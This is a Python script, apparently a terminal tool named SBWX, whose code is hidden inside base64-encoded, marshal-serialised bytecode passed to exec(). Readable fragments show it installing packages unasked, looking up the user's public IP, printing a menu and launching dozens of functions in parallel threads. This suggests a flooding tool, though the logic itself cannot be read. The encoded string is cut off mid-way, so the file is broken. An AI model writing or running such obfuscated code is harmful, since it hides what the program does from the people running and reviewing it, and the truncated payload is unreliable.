    for module in net.modules():
        if isinstance(module, nn.Conv2d):
            lecun_normal_(module.weight)
            if module.bias is not None:
                init.constant_(module.bias, 0)
        elif isinstance(module, nn.BatchNorm2d):
            init.constant_(module.weight, 1)
            init.constant_(module.bias, 0)
        elif isinstance(module, nn.Linear):
            lecun_normal_(module.weight)
            init.constant_(module.bias, 0)
        elif type(module) in (nn.GRU, nn.LSTM, nn.RNN):
            for param_name, param in module.named_parameters():
                if 'weight_ih' in param_name or 'weight_hh' in param_name:
                    lecun_normal_(param.data)
                elif 'bias' in param_name:
                    param.data.fill_(0)
def he_normal_(tensor):
    """In-place init from N(0, 2/sqrt(fan_in)); returns *tensor*.

    NOTE(review): the classic He/Kaiming-normal std is sqrt(2 / fan_in);
    here gain 2.0 yields std = 2 / sqrt(fan_in), a larger scale.  Behavior
    preserved as-is — confirm whether this is intentional.
    """
    fan_in = init._calculate_correct_fan(tensor, 'fan_in')
    with torch.no_grad():
        return tensor.normal_(0, 2. / math.sqrt(fan_in))
def weights_init_he(net):
    """Initialise *net* in place with Kaiming-normal (fan_out, relu) weights.

    Conv2d/Linear weights get ``kaiming_normal_(mode='fan_out',
    nonlinearity='relu')`` with zeroed biases when present; BatchNorm2d is
    set to weight=1, bias=0.
    """
    for module in net.modules():
        # Conv2d and Linear share the same treatment here, so fold them.
        if isinstance(module, (nn.Conv2d, nn.Linear)):
            nn.init.kaiming_normal_(module.weight, mode='fan_out', nonlinearity='relu')
            if module.bias is not None:
                init.constant_(module.bias, 0)
        elif isinstance(module, nn.BatchNorm2d):
            init.constant_(module.weight, 1)
            init.constant_(module.bias, 0)
| 35.057554
| 82
| 0.575621
| 652
| 4,873
| 4.127301
| 0.121166
| 0.039019
| 0.096618
| 0.09476
| 0.856559
| 0.837235
| 0.818655
| 0.800074
| 0.760684
| 0.749164
| 0
| 0.013885
| 0.305356
| 4,873
| 138
| 83
| 35.311594
| 0.781093
| 0.039196
| 0
| 0.823009
| 0
| 0
| 0.034416
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.070796
| false
| 0
| 0.035398
| 0
| 0.123894
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
30c0de55826a83822e34859d9ab4e700c4d542b4
| 3,241
|
py
|
Python
|
tests/nn/modules/test_transformer.py
|
gooppe/deep-summarization-toolkit
|
e249b7c31c817fedbc3133a3799c23a0115091bd
|
[
"MIT"
] | 7
|
2019-05-30T18:19:42.000Z
|
2020-03-25T06:52:40.000Z
|
tests/nn/modules/test_transformer.py
|
gooppe/deep-summarization-toolkit
|
e249b7c31c817fedbc3133a3799c23a0115091bd
|
[
"MIT"
] | null | null | null |
tests/nn/modules/test_transformer.py
|
gooppe/deep-summarization-toolkit
|
e249b7c31c817fedbc3133a3799c23a0115091bd
|
[
"MIT"
] | 3
|
2019-05-26T18:45:15.000Z
|
2020-03-24T20:20:46.000Z
|
import unittest
import torch
from dst.nn import PBATransformerEncoderLayer, PBATransformerDecoderLayer
class TestPBATransformerEncoderLayer(unittest.TestCase):
    """Shape-preservation tests for PBATransformerEncoderLayer.

    Each test builds a layer with one attention flavour and checks that the
    output keeps the input's (batch, seq, dim) shape.
    """

    @staticmethod
    def _run_layer(attention, **attention_args):
        """Build a layer with fixed dims, run a random input, return (out, input)."""
        dim_m, dim_proj, dim_i, dropout = 32, 16, 64, 0.1
        batch_size, seq_len = 8, 7
        input = torch.randn(batch_size, seq_len, dim_m)
        layer = PBATransformerEncoderLayer(dim_m, dim_proj, dim_i, dropout, attention, **attention_args)
        return layer(input), input

    def test_homogeneous_forward(self):
        out, input = self._run_layer("homogeneous", head_convs=(3, 2, 3))
        self.assertTupleEqual(out.shape, input.shape)

    def test_heterogeneous_forward(self):
        out, input = self._run_layer("heterogeneous", head_convs=(1, 0, 3), n_heads=8)
        self.assertTupleEqual(out.shape, input.shape)

    def test_interleaved_forward(self):
        out, input = self._run_layer("interleaved")
        self.assertTupleEqual(out.shape, input.shape)
class TestPBATransformerDecoderLayer(unittest.TestCase):
    """Shape-preservation tests for PBATransformerDecoderLayer.

    Each test runs a random decoder input against a random encoder sequence
    and checks that the output keeps the decoder input's shape.
    """

    @staticmethod
    def _run_layer(attention, **attention_args):
        """Build a layer with fixed dims, run random sequences, return (out, input_seq)."""
        dim_m, dim_proj, dim_i, dropout = 32, 16, 64, 0.1
        batch_size, inp_seq_len, enc_seq_len = 8, 7, 9
        input_seq = torch.randn(batch_size, inp_seq_len, dim_m)
        encoder_seq = torch.randn(batch_size, enc_seq_len, dim_m)
        layer = PBATransformerDecoderLayer(dim_m, dim_proj, dim_i, dropout, attention, **attention_args)
        return layer(input_seq, encoder_seq), input_seq

    def test_homogeneous_forward(self):
        out, input_seq = self._run_layer("homogeneous", head_convs=(3, 2, 3))
        self.assertTupleEqual(out.shape, input_seq.shape)

    def test_heterogeneous_forward(self):
        out, input_seq = self._run_layer("heterogeneous", head_convs=(1, 0, 3), n_heads=8)
        self.assertTupleEqual(out.shape, input_seq.shape)

    def test_interleaved_forward(self):
        out, input_seq = self._run_layer("interleaved")
        self.assertTupleEqual(out.shape, input_seq.shape)
| 38.583333
| 104
| 0.680037
| 448
| 3,241
| 4.627232
| 0.120536
| 0.040521
| 0.040521
| 0.063676
| 0.921852
| 0.921852
| 0.921852
| 0.921852
| 0.921852
| 0.903521
| 0
| 0.030519
| 0.221537
| 3,241
| 83
| 105
| 39.048193
| 0.791122
| 0
| 0
| 0.883333
| 0
| 0
| 0.021598
| 0
| 0
| 0
| 0
| 0
| 0.1
| 1
| 0.1
| false
| 0
| 0.05
| 0
| 0.183333
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
a5108022a529dd693bc4207fa9dfd8bc7898e2c2
| 3,316
|
py
|
Python
|
api/migrations/0001_initial.py
|
feemagdev/appointment-project-rest-api
|
2d74d23d73e37f5181bc22f53ac4c8cba7a7423b
|
[
"MIT"
] | null | null | null |
api/migrations/0001_initial.py
|
feemagdev/appointment-project-rest-api
|
2d74d23d73e37f5181bc22f53ac4c8cba7a7423b
|
[
"MIT"
] | null | null | null |
api/migrations/0001_initial.py
|
feemagdev/appointment-project-rest-api
|
2d74d23d73e37f5181bc22f53ac4c8cba7a7423b
|
[
"MIT"
] | null | null | null |
# Generated by Django 2.2 on 2021-01-26 04:32
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
    """Initial schema for the api app (auto-generated by Django 2.2).

    Creates client, employee and appointment tables.  NOTE(review): this is
    a generated migration — field order and options must stay in sync with
    Django's recorded migration state; do not hand-edit the operations.
    """
    initial = True
    dependencies = [
    ]
    operations = [
        # Company customer record; phone is the unique natural key.
        # NOTE(review): max_length=10 for company/contact looks low — verify.
        migrations.CreateModel(
            name='BusinessClient',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('company', models.CharField(max_length=10)),
                ('contact', models.CharField(max_length=10)),
                ('phone', models.CharField(max_length=10, unique=True)),
                ('address', models.CharField(max_length=255)),
                ('city', models.CharField(max_length=255)),
                ('state', models.CharField(max_length=2)),
                ('zipcode', models.CharField(max_length=15)),
            ],
        ),
        # Individual customer record; phone is the unique natural key.
        migrations.CreateModel(
            name='Client',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('first_name', models.CharField(max_length=255)),
                ('last_name', models.CharField(max_length=255)),
                ('phone', models.CharField(max_length=10, unique=True)),
                ('address', models.CharField(max_length=255)),
                ('city', models.CharField(max_length=255)),
                ('state', models.CharField(max_length=2)),
                ('zipcode', models.CharField(max_length=15)),
            ],
        ),
        migrations.CreateModel(
            name='Employee',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('name', models.CharField(max_length=255)),
                ('phone', models.CharField(max_length=10, unique=True)),
            ],
        ),
        # Appointment between an individual Client and an Employee; rows are
        # deleted in cascade when either side is removed.
        migrations.CreateModel(
            name='PersonalAppointment',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('appointment_date', models.DateField()),
                ('appointment_time', models.TimeField()),
                ('confirmed', models.BooleanField()),
                ('date_added', models.DateTimeField()),
                ('client_id', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='api.Client')),
                ('employee_id', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='api.Employee')),
            ],
        ),
        # Same shape as PersonalAppointment but linked to a BusinessClient.
        migrations.CreateModel(
            name='BusinessAppointment',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('appointment_date', models.DateField()),
                ('appointment_time', models.TimeField()),
                ('confirmed', models.BooleanField()),
                ('date_added', models.DateTimeField()),
                ('bclient_id', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='api.BusinessClient')),
                ('employee_id', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='api.Employee')),
            ],
        ),
    ]
| 44.810811
| 120
| 0.565742
| 315
| 3,316
| 5.806349
| 0.222222
| 0.131219
| 0.157463
| 0.209951
| 0.804265
| 0.775834
| 0.758885
| 0.758885
| 0.758885
| 0.758885
| 0
| 0.021601
| 0.287998
| 3,316
| 73
| 121
| 45.424658
| 0.753071
| 0.012967
| 0
| 0.69697
| 1
| 0
| 0.115867
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.030303
| 0
| 0.090909
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
ebdeea581a0a16352789eaf6e7ef18cbdf800afb
| 63,758
|
py
|
Python
|
SBWX.py
|
WIROUX/SBWX
|
068b3744bf4cfca00ab1501a12c687210e3c9829
|
[
"MIT"
] | null | null | null |
SBWX.py
|
WIROUX/SBWX
|
068b3744bf4cfca00ab1501a12c687210e3c9829
|
[
"MIT"
] | null | null | null |
SBWX.py
|
WIROUX/SBWX
|
068b3744bf4cfca00ab1501a12c687210e3c9829
|
[
"MIT"
] | null | null | null |
import base64
exec(base64.b64decode("# yak boos be kalat  
import marshal 
exec(marshal.loads(b'\xe3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x00\x00@\x00\x00\x00s\xb4\x0c\x00\x00d\x00d\x01l\x00Z\x00e\x00\xa0\x01d\x02\xa1\x01\x01\x00e\x00\xa0\x01d\x03\xa1\x01\x01\x00e\x00\xa0\x01d\x04\xa1\x01\x01\x00e\x00\xa0\x01d\x05\xa1\x01\x01\x00d\x00d\x01l\x02Z\x02d\x00d\x01l\x03Z\x03d\x00d\x01l\x04Z\x04d\x00d\x01l\x05Z\x05d\x00d\x01l\x06Z\x06d\x00d\x01l\x07Z\x07e\x07\xa0\x08\xa1\x00Z\te\x00\xa0\x01d\x06\xa1\x01\x01\x00d\x07d\x08\x84\x00Z\nd\x00d\tl\x0bm\x0cZ\r\x01\x00d\x00d\nl\x0em\x0fZ\x0fm\x10Z\x10\x01\x00e\x11e\x0fj\x12d\x0b\x17\x00\x83\x01\x01\x00e\x00\xa0\x01d\x0c\xa1\x01\x01\x00e\x05\xa0\x13d\r\xa1\x01\x01\x00e\x11e\x0fj\x12d\x0e\x17\x00\x83\x01\x01\x00e\x00\xa0\x01d\x0f\xa1\x01\x01\x00e\x05\xa0\x13d\r\xa1\x01\x01\x00e\x00\xa0\x01d\x06\xa1\x01\x01\x00e\x11e\x0fj\x14d\x10\x17\x00e\x0fj\x15\x17\x00d\x11\x17\x00e\x0fj\x16\x17\x00d\x12\x17\x00e\x0fj\x17\x17\x00d\x13\x17\x00e\x0fj\x14\x17\x00d\x14\x17\x00e\x0fj\x15\x17\x00d\x15\x17\x00e\x0fj\x16\x17\x00d\x16\x17\x00e\x0fj\x17\x17\x00d\x17\x17\x00e\x0fj\x14\x17\x00d\x18\x17\x00e\x0fj\x15\x17\x00d\x15\x17\x00e\x0fj\x16\x17\x00d\x16\x17\x00e\x0fj\x17\x17\x00d\x19\x17\x00e\x0fj\x14\x17\x00d\x1a\x17\x00e\x0fj\x15\x17\x00d\x1b\x17\x00e\x0fj\x16\x17\x00d\x16\x17\x00e\x0fj\x17\x17\x00d\x1c\x17\x00e\x0fj\x14\x17\x00d\x1d\x17\x00e\x0fj\x15\x17\x00d\x1e\x17\x00e\x0fj\x16\x17\x00d\x16\x17\x00e\x0fj\x17\x17\x00d\x1f\x17\x00e\x0fj\x14\x17\x00d 
\x17\x00e\x0fj\x15\x17\x00d!\x17\x00e\x0fj\x16\x17\x00d\x16\x17\x00e\x0fj\x17\x17\x00d"\x17\x00e\x0fj\x14\x17\x00d#\x17\x00e\x0fj\x15\x17\x00d\x15\x17\x00e\x0fj\x16\x17\x00d$\x17\x00e\x0fj\x17\x17\x00d%\x17\x00e\x0fj\x14\x17\x00d&\x17\x00e\x0fj\x15\x17\x00d\'\x17\x00e\x0fj\x16\x17\x00d(\x17\x00e\x0fj\x17\x17\x00d)\x17\x00\x83\x01\x01\x00e\x11e\x0fj\x18d*\x17\x00\x83\x01\x01\x00e\x11e\x0fj\x18d+\x17\x00\x83\x01\x01\x00e\x00\xa0\x01d,\xa1\x01\x01\x00e\x11e\x0fj\x17d-\x17\x00e\x0fj\x19\x17\x00d.\x17\x00e\x0fj\x1a\x17\x00d/\x17\x00e\x0fj\x1b\x17\x00d0\x17\x00e\x0fj\x1a\x17\x00d1\x17\x00e\x0fj\x16\x17\x00d2\x17\x00e\x0fj\x19\x17\x00d3\x17\x00e\x0fj\x19\x17\x00d.\x17\x00e\x0fj\x1a\x17\x00d/\x17\x00e\x0fj\x1b\x17\x00d4\x17\x00e\x0fj\x1a\x17\x00d5\x17\x00e\x0fj\x16\x17\x00d6\x17\x00e\x0fj\x19\x17\x00d7\x17\x00e\x0fj\x19\x17\x00d8\x17\x00e\x0fj\x1a\x17\x00d9\x17\x00e\x0fj\x1b\x17\x00d:\x17\x00e\x0fj\x1a\x17\x00d1\x17\x00e\x0fj\x16\x17\x00d;\x17\x00e\x0fj\x19\x17\x00d<\x17\x00e\x0fj\x19\x17\x00d=\x17\x00e\x0fj\x1a\x17\x00d>\x17\x00e\x0fj\x1b\x17\x00d?\x17\x00e\x0fj\x1a\x17\x00d1\x17\x00e\x0fj\x16\x17\x00d@\x17\x00e\x0fj\x19\x17\x00dA\x17\x00e\x0fj\x17\x17\x00dB\x17\x00\x83\x01\x01\x00e\x11e\x0fj\x14dC\x17\x00e\x0fj\x15\x17\x00dD\x17\x00e\x0fj\x14\x17\x00dE\x17\x00e\x0fj\x15\x17\x00dF\x17\x00\x83\x01\x01\x00e\x00\xa0\x01dG\xa1\x01\x01\x00e\x05\xa0\x13dH\xa1\x01\x01\x00e\x00\xa0\x01dI\xa1\x01\x01\x00e\x11e\x0fj\x17dJ\x17\x00e\n\x83\x00\x17\x00\x83\x01\x01\x00e\x1ce\x0fj\x18dK\x17\x00e\x0fj\x1a\x17\x00d8\x17\x00e\x0fj\x1b\x17\x00dL\x17\x00e\x0fj\x1d\x17\x00dM\x17\x00e\x0fj\x1b\x17\x00dN\x17\x00e\x0fj\x1d\x17\x00dM\x17\x00e\x0fj\x1b\x17\x00d?\x17\x00e\x0fj\x1a\x17\x00dO\x17\x00e\x0fj\x18\x17\x00dP\x17\x00e\x0fj\x1a\x17\x00d8\x17\x00e\x0fj\x1b\x17\x00d0\x17\x00e\x0fj\x1a\x17\x00dO\x17\x00e\x0fj\x19\x17\x00dQ\x17\x00\x83\x01Z\x1ee\x1ed0k\x02\x90\x05r\ne\x00\xa0\x01d\x06\xa1\x01\x01\x00e\x05\xa0\x13dR\xa1\x01\x01\x00e\x00\xa0\x01d\x06\xa1\x01\x01\x00e\x11e\x0fj\x14dS\x17\x00e\x0fj\x
1d\x17\x00dT\x17\x00e\x0fj\x1a\x17\x00dU\x17\x00e\x0fj\x1d\x17\x00dV\x17\x00e\x0fj\x19\x17\x00dW\x17\x00e\x0fj\x1b\x17\x00dX\x17\x00e\x0fj\x14\x17\x00dY\x17\x00e\x0fj\x1d\x17\x00dT\x17\x00e\x0fj\x1a\x17\x00dU\x17\x00e\x0fj\x1d\x17\x00dV\x17\x00e\x0fj\x19\x17\x00dZ\x17\x00e\x0fj\x15\x17\x00d/\x17\x00e\n\x83\x00\x17\x00d1\x17\x00e\x0fj\x14\x17\x00d[\x17\x00e\x0fj\x1d\x17\x00dT\x17\x00e\x0fj\x1a\x17\x00dU\x17\x00e\x0fj\x1d\x17\x00dV\x17\x00e\x0fj\x19\x17\x00d\\\x17\x00e\x0fj\x15\x17\x00d]\x17\x00e\tj\x01\x17\x00d]\x17\x00e\x0fj\x14\x17\x00d[\x17\x00e\x0fj\x1d\x17\x00dT\x17\x00e\x0fj\x1a\x17\x00dU\x17\x00e\x0fj\x1d\x17\x00dV\x17\x00e\x0fj\x19\x17\x00d^\x17\x00e\x0fj\x15\x17\x00d]\x17\x00e\tj\x1f\x17\x00d]\x17\x00e\x0fj\x14\x17\x00d_\x17\x00e\x0fj\x1d\x17\x00dT\x17\x00e\x0fj\x1a\x17\x00dU\x17\x00e\x0fj\x1d\x17\x00dV\x17\x00e\x0fj\x19\x17\x00d`\x17\x00e\x0fj\x15\x17\x00d]\x17\x00e\tj \x17\x00d]\x17\x00e\x0fj\x14\x17\x00da\x17\x00e\x0fj\x1d\x17\x00dT\x17\x00e\x0fj\x1a\x17\x00dU\x17\x00e\x0fj\x1d\x17\x00dV\x17\x00e\x0fj\x19\x17\x00db\x17\x00e\x0fj\x15\x17\x00d]\x17\x00e\tj!\x17\x00d]\x17\x00e\x0fj\x14\x17\x00dc\x17\x00e\x0fj\x1d\x17\x00dT\x17\x00e\x0fj\x1a\x17\x00dU\x17\x00e\x0fj\x1d\x17\x00dV\x17\x00e\x0fj\x19\x17\x00dd\x17\x00e\x0fj\x15\x17\x00d]\x17\x00e\tj"\x17\x00d]\x17\x00e\x0fj\x14\x17\x00de\x17\x00\x83\x01\x01\x00e\x1ce\x0fj\x16df\x17\x00e\x0fj#\x17\x00dg\x17\x00e\x0fj\x1b\x17\x00dh\x17\x00e\x0fj\x1d\x17\x00di\x17\x00\x83\x01Z$dje$\x17\x00Z%dke&f\x02dldm\x84\x04Z\'dke&f\x02dndo\x84\x04Z(dpdq\x84\x00Z)drds\x84\x00Z*dtdu\x84\x00Z+dvdw\x84\x00Z,dxdy\x84\x00Z-dzd{\x84\x00Z.d|d}\x84\x00Z/d~d\x7f\x84\x00Z0d\x80d\x81\x84\x00Z1d\x82d\x83\x84\x00Z2d\x84d\x85\x84\x00Z3d\x86d\x87\x84\x00Z4d\x88d\x89\x84\x00Z5d\x8ad\x8b\x84\x00Z6d\x8cd\x8d\x84\x00Z7d\x8ed\x8f\x84\x00Z8d\x90d\x91\x84\x00Z9d\x92d\x93\x84\x00Z:d\x94d\x95\x84\x00Z;d\x96d\x97\x84\x00Z<d\x98d\x99\x84\x00Z=d\x9ad\x9b\x84\x00Z>d\x9cd\x9d\x84\x00Z?d\x9ed\x9f\x84\x00Z@d\xa0d\xa1\x84\x00ZAd\xa2d\xa3\x84\x00ZBd\xa4d\xa5\x8
4\x00ZCd\xa6d\xa7\x84\x00ZDd\xa8d\xa9\x84\x00ZEd\xaad\xab\x84\x00ZFd\xacd\xad\x84\x00ZGd\xaed\xaf\x84\x00ZHd\xb0d\xb1\x84\x00ZId\xb2d\xb3\x84\x00ZJd\xb4d\xb5\x84\x00ZKd\xb6d\xb7\x84\x00ZLd\xb8d\xb9\x84\x00ZMd\xbad\xbb\x84\x00ZNd\xbcdo\x84\x00Z(d\xbdd\xbe\x84\x00ZOe\re)d\xbf\x8d\x01\xa0P\xa1\x00\x01\x00e\re*d\xbf\x8d\x01\xa0P\xa1\x00\x01\x00e\re+d\xbf\x8d\x01\xa0P\xa1\x00\x01\x00e\re,d\xbf\x8d\x01\xa0P\xa1\x00\x01\x00e\re.d\xbf\x8d\x01\xa0P\xa1\x00\x01\x00e\re/d\xbf\x8d\x01\xa0P\xa1\x00\x01\x00e\re0d\xbf\x8d\x01\xa0P\xa1\x00\x01\x00e\re1d\xbf\x8d\x01\xa0P\xa1\x00\x01\x00e\re2d\xbf\x8d\x01\xa0P\xa1\x00\x01\x00e\re3d\xbf\x8d\x01\xa0P\xa1\x00\x01\x00e\re4d\xbf\x8d\x01\xa0P\xa1\x00\x01\x00e\re5d\xbf\x8d\x01\xa0P\xa1\x00\x01\x00e\re6d\xbf\x8d\x01\xa0P\xa1\x00\x01\x00e\re7d\xbf\x8d\x01\xa0P\xa1\x00\x01\x00e\re8d\xbf\x8d\x01\xa0P\xa1\x00\x01\x00e\re9d\xbf\x8d\x01\xa0P\xa1\x00\x01\x00e\re:d\xbf\x8d\x01\xa0P\xa1\x00\x01\x00e\re;d\xbf\x8d\x01\xa0P\xa1\x00\x01\x00e\re<d\xbf\x8d\x01\xa0P\xa1\x00\x01\x00e\re=d\xbf\x8d\x01\xa0P\xa1\x00\x01\x00e\re>d\xbf\x8d\x01\xa0P\xa1\x00\x01\x00e\re?d\xbf\x8d\x01\xa0P\xa1\x00\x01\x00e\re@d\xbf\x8d\x01\xa0P\xa1\x00\x01\x00e\reAd\xbf\x8d\x01\xa0P\xa1\x00\x01\x00e\reBd\xbf\x8d\x01\xa0P\xa1\x00\x01\x00e\reCd\xbf\x8d\x01\xa0P\xa1\x00\x01\x00e\reDd\xbf\x8d\x01\xa0P\xa1\x00\x01\x00e\reEd\xbf\x8d\x01\xa0P\xa1\x00\x01\x00e\reFd\xbf\x8d\x01\xa0P\xa1\x00\x01\x00e\reGd\xbf\x8d\x01\xa0P\xa1\x00\x01\x00e\reHd\xbf\x8d\x01\xa0P\xa1\x00\x01\x00e\re-d\xbf\x8d\x01\xa0P\xa1\x00\x01\x00e\reId\xbf\x8d\x01\xa0P\xa1\x00\x01\x00e\reJd\xbf\x8d\x01\xa0P\xa1\x00\x01\x00e\reKd\xbf\x8d\x01\xa0P\xa1\x00\x01\x00e\reLd\xbf\x8d\x01\xa0P\xa1\x00\x01\x00e\reMd\xbf\x8d\x01\xa0P\xa1\x00\x01\x00e\reNd\xbf\x8d\x01\xa0P\xa1\x00\x01\x00e\re(d\xbf\x8d\x01\xa0P\xa1\x00\x01\x00e\reOd\xbf\x8d\x01\xa0P\xa1\x00\x01\x00d\x01S\x00e\x1edLk\x02\x90\x05s\x14e\x1ed4k\x02\x90\x05rce\x00\xa0\x01d\x06\xa1\x01\x01\x00e\x00\xa0\x01d\xc0\xa1\x01\x01\x00e\x1cd\xc1\x83\x01ZQeQd\xc2k\x02\x90\x05s,eQd\xc3k\
x02\x90\x05rDe\x00\xa0\x01d\xc4\xa1\x01\x01\x00e\x11e\x0fj\x1ad\xc5\x17\x00\x83\x01\x01\x00e\x05\xa0\x13d\r\xa1\x01\x01\x00e\x00\xa0\x01d\xc6\xa1\x01\x01\x00d\x01S\x00eQd\xc7k\x02\x90\x05sNeQd\xc8k\x02\x90\x05rae\x11e\x0fj\x1ad\xc9\x17\x00\x83\x01\x01\x00e\x05\xa0\x13d\r\xa1\x01\x01\x00e\x00\xa0\x01d\xca\xa1\x01\x01\x00d\x01S\x00d\x01S\x00e\x1edNk\x02\x90\x05sme\x1ed:k\x02\x90\x05r\xa2e\x00\xa0\x01d\x06\xa1\x01\x01\x00e\x11e\x0fj\x1bd\xcb\x17\x00\x83\x01\x01\x00e\x11e\x0fj\x18d\xcc\x17\x00\x83\x01\x01\x00e\x05\xa0\x13d\xcd\xa1\x01\x01\x00e\x11d\xce\x83\x01\x01\x00e\x05\xa0\x13d\xcd\xa1\x01\x01\x00e\x11dN\x83\x01\x01\x00e\x05\xa0\x13d\xcd\xa1\x01\x01\x00e\x11dL\x83\x01\x01\x00e\x00\xa0\x01d\xcf\xa1\x01\x01\x00d\x01S\x00e\x1ed?k\x02\x90\x05s\xace\x1edjk\x02\x90\x06rTe\x00\xa0\x01d\x06\xa1\x01\x01\x00e\x00\xa0\x01d\xd0\xa1\x01\x01\x00e\x1ce\x0fj\x18d\xd1\x17\x00\x83\x01ZMeMd\xc2k\x02\x90\x05s\xc7eMd\xc3k\x02\x90\x05r\xdde\x00\xa0\x01d\xd2\xa1\x01\x01\x00e\x00\xa0\x01d\x06\xa1\x01\x01\x00e\x11e\x0fj\x17d\xd3\x17\x00\x83\x01\x01\x00eR\x83\x00\x01\x00d\x01S\x00eMd\xc7k\x02\x90\x05s\xe7eMd\xc8k\x02\x90\x06rVe\x00\xa0\x01d\xd4\xa1\x01\x01\x00e\x1ce\x0fj\x14d\xd5\x17\x00\x83\x01ZSeSd\xc2k\x02\x90\x05s\xfdeSd\xc3k\x02\x90\x06r\x10e\x11e\x0fj\x1ad\xd6\x17\x00\x83\x01\x01\x00e\x05\xa0\x13d\xcd\xa1\x01\x01\x00e\x00\xa0\x01d\xca\xa1\x01\x01\x00d\x01S\x00eSd\xc7k\x02\x90\x06s\x1aeSd\xc8k\x02\x90\x06rXe\x00\xa0\x01d\xd2\xa1\x01\x01\x00e\x11e\x0fj\x14d\xd7\x17\x00\x83\x01\x01\x00e\x05\xa0\x13d\xd8\xa1\x01\x01\x00e\x11e\x0fj\x16d\xd9\x17\x00\x83\x01\x01\x00e\x05\xa0\x13d\xd8\xa1\x01\x01\x00e\x11e\x0fj\x16d\xda\x17\x00\x83\x01\x01\x00e\x05\xa0\x13d\xd8\xa1\x01\x01\x00e\x11e\x0fj\x16dL\x17\x00\x83\x01\x01\x00e\x05\xa0\x13d\xdb\xa1\x01\x01\x00eR\x83\x00\x01\x00d\x01S\x00d\x01S\x00d\x01S\x00d\x01S\x00)\xdc\xe9\x00\x00\x00\x00Nz\x1apip3 install --upgrade pipz\x15pip3 install coloramaz\x15pip3 install requestsz\x15pkg install espeak 
-y\xda\x05clearc\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00C\x00\x00\x00s$\x00\x00\x00z\x07t\x00\xa0\x01d\x01\xa1\x01j\x02W\x00S\x00\x01\x00\x01\x00\x01\x00t\x03j\x04d\x02\x17\x00\x06\x00Y\x00S\x00)\x03Nz!https://api.ipify.org?format=textz\x1dna moshakhas nis dash bemolla)\x05\xda\x08requests\xda\x03get\xda\x04text\xda\x04Fore\xda\x04CYAN\xa9\x00r\x08\x00\x00\x00r\x08\x00\x00\x00\xda\x00\xda\x02sw\x0f\x00\x00\x00s\x08\x00\x00\x00\x02\x01\x0e\x01\x06\x01\x0e\x01r\n\x00\x00\x00)\x01\xda\x06Thread)\x02r\x06\x00\x00\x00\xda\x04Backz"Hello, thank you for using my toolz2espeak "Hello, thank you for using my tool" -s 120\xe9\x01\x00\x00\x00z.salam , mamnon ke az abzr man estefadeh mikonizEespeak "salam , mamnon, ke, as, abzar, man, estfadeh, mikony." s- 120u\x1f\x00\x00\x00\n   \xe2\x96\x84\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88u#\x00\x00\x00 \xe2\x96\x80\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x84 u\x14\x00\x00\x00  \xe2\x96\x84\xe2\x96\x88     \xe2\x96\x88\xe2\x96\x84 u\'\x00\x00\x00 \xe2\x96\x80\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88    \xe2\x96\x90\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x80 u\x19\x00\x00\x00\n  \xe2\x96\x88\xe2\x96\x88\xe2\x96\x88    \xe2\x96\x88\xe2\x96\x88\xe2\x96\x88u\x19\x00\x00\x00   \xe2\x96\x88\xe2\x96\x88\xe2\x96\x88    \xe2\x96\x88\xe2\x96\x88\xe2\x96\x88u\x18\x00\x00\x00 \xe2\x96\x88\xe2\x96\x88\xe2\x96\x88     \xe2\x96\x88\xe2\x96\x88\xe2\x96\x88u#\x00\x00\x00   \xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x8c   \xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88\xe2\x96\x80  u\x17\x00\x00\x00\n  \xe2\x96\x88\xe2\x96\x88\xe2\x96\x88    \xe2\x96\x88\xe2\x96\x80 u\x1f\x00\x00\x00    \xe2\x96\x88\xe2\x96\x88\xe2\x96\x88  \xe2\x96\x90\xe2\x96\x88\xe2\x96\x88\xe2\x96\x88    u\x13\x00\x00\x00\n  \xe2\x96\x88\xe2\x96\x88\xe2\x96\x88       u!\x00\x00\x00  
